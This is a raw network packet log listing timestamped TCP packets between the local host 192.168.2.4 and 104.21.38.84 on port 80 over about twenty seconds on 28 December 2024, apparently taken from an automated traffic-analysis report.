                                                                        Dec 28, 2024 20:42:46.898964882 CET4974380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.899084091 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:46.899149895 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:46.899283886 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:47.018821955 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.254412889 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:47.374166965 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.374177933 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.374248981 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.458699942 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.469841003 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:47.589572906 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.802097082 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.804049015 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:47.924880981 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:47.924899101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.030553102 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.110450029 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.271955967 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.313570976 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.329431057 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.331284046 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.450962067 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.663532972 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.663861990 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.750056028 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.750890970 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.783620119 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.783629894 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.870090008 CET8049744104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.870160103 CET4974480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.870358944 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:48.870515108 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.870582104 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:48.990371943 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.192925930 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.197416067 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:49.236679077 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:49.317003965 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.356343031 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.356374025 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.356410980 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.529613972 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.529795885 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:49.649566889 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:49.649746895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.096729040 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.096831083 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.105993032 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:50.177018881 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:50.225493908 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.243901968 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.297880888 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:50.446816921 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.447922945 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:50.567424059 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.567512989 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.974180937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:50.977061987 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.054970026 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.055728912 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.096560001 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.176217079 CET8049745104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.176279068 CET4974580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.176282883 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.176343918 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.176445961 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.296390057 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.309544086 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.309731960 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.429727077 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.429862976 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.532787085 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.653573036 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.653641939 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.653724909 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.839319944 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:51.840102911 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:51.959878922 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.172853947 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.173199892 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:52.293410063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.293420076 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.354885101 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.500976086 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:52.642426014 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.755523920 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:52.756329060 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:52.797856092 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:52.875873089 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.089735031 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.117301941 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.237962008 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.238018036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.645412922 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.646351099 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.651767969 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.653045893 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.766061068 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.771752119 CET8049746104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.771857977 CET4974680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.772666931 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.772785902 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.772964001 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:53.892482996 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.978924990 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:53.979201078 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:54.098767042 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.098947048 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.169359922 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:54.289032936 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.289051056 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.289061069 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.512942076 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.517021894 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:54.636589050 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.849379063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.849544048 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:54.949637890 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.969036102 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:54.969137907 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.000993967 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.205137014 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.289791107 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.376430035 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.382090092 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.446764946 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.447519064 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.501585960 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.566695929 CET8049748104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.566752911 CET4974880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.567004919 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.567076921 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.567270041 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.687200069 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.714809895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.714973927 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:55.834543943 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:55.834562063 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.242290974 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.292149067 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:56.340473890 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:56.411681890 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.411691904 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.411717892 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.460205078 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.673288107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.673485994 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:56.698996067 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.794821024 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.794830084 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:56.813476086 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:56.944691896 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.016608000 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:57.203892946 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.205617905 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:57.329222918 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.543379068 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.543543100 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:57.663077116 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.663206100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:57.999330997 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.001964092 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.068196058 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.070643902 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.119132996 CET8049749104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.119189024 CET4974980192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.121654034 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.121720076 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.121887922 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.191385984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.242897987 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.403475046 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.403667927 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.469822884 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:58.523233891 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.523334026 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.589454889 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.589469910 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.589483976 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.976541042 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:58.993335009 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.114090919 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.348385096 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.420763969 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.420785904 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.468111038 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.468122959 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.543477058 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.543524027 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.557224989 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.672040939 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.727685928 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.742187977 CET4975280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.847795963 CET8049751104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.850095034 CET4975180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.861721039 CET8049752104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.862123966 CET4975280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.862252951 CET4975280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.872209072 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.875273943 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:42:59.981643915 CET8049752104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:42:59.994786024 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:00.207727909 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:00.207890034 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:00.219811916 CET4975280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:00.328315020 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:00.328325987 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:00.339402914 CET8049752104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:00.339411020 CET8049752104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:00.339452028 CET8049752104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:00.744122982 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:00.745014906 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:00.864908934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.006167889 CET8049752104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.077418089 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.078218937 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.110369921 CET4975280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.200942993 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.201045036 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.244499922 CET8049752104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.313478947 CET4975280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.432826042 CET4975280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.433511019 CET4975380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.559103966 CET8049753104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.559237957 CET4975380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.559376955 CET4975380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.559551954 CET8049752104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.559618950 CET4975280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.605895996 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.607031107 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.679671049 CET8049753104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.728038073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.907310963 CET4975380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:01.940743923 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:01.940958023 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:02.026875019 CET8049753104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.026905060 CET8049753104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.026915073 CET8049753104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.060794115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.060899019 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.472172022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.473006010 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:02.593252897 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.737859011 CET8049753104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.805336952 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.805533886 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:02.891621113 CET4975380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:02.929833889 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.929852009 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:02.993202925 CET8049753104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.156919003 CET4975380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.157985926 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.276778936 CET8049753104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.277488947 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.277553082 CET4975380192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.277580976 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.277700901 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.335453033 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.336776018 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.397089005 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.456252098 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.626080990 CET4975580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.669231892 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.685762882 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.685870886 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.745810986 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.745820999 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.745829105 CET8049755104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807532072 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807542086 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807631016 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807638884 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807653904 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.807691097 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.807723999 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807746887 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807790995 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.807873964 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807915926 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807924032 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.807965040 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808006048 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808015108 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808048964 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808142900 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808185101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808188915 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808223963 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808279991 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808345079 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808397055 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808429003 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808439016 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808475971 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808502913 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808540106 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808564901 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808640003 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808648109 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808691978 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808717012 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808754921 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808773994 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808813095 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808862925 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808896065 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808904886 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808950901 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.808990002 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.808999062 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809042931 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809084892 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809113979 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809165001 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809206963 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809216022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809231043 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809238911 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809257984 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809284925 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809309006 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809319019 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809357882 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809387922 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809418917 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809428930 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809453011 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809465885 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809535027 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809580088 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:03.809595108 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:03.809643030 CET8049734104.21.38.84192.168.2.4
